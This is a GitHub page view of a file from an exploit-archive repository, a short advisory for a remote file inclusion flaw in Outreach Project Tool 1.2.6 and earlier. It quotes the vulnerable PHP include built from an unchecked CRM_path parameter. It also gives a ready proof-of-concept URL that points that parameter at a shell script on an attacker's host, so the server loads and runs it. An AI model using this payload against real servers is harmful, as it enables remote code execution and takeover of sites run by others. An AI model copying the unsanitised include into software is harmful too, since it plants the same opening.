forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10013.txt
21 lines (17 loc) · 849 Bytes
/
10013.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Outreach Project Tool <= 1.2.6 Remote File Inclusion Vulnerability
==================================================================
########################################################################
# OPT (Outreach Project Tool) <= 1.2.6 [CRM_path] Remote File Include Vulnerability
# Download Script : http://sourceforge.net/projects/outreach
# Dork : "Adhan Handsome" :D
########################################################################
#
# Vuln : ./OPT_1-2-7_MAX/opt/forums/Forum_Include/index.php (line 10)
# <?php
# include "$CRM_path/forums/Forum_Include/forum_admin.inc";
# ?>
# PoC : http://server/[path]/forums/Forum_Include/index.php?CRM_path=http://[attacker]/shell.txt???
#
#
#
########################################################################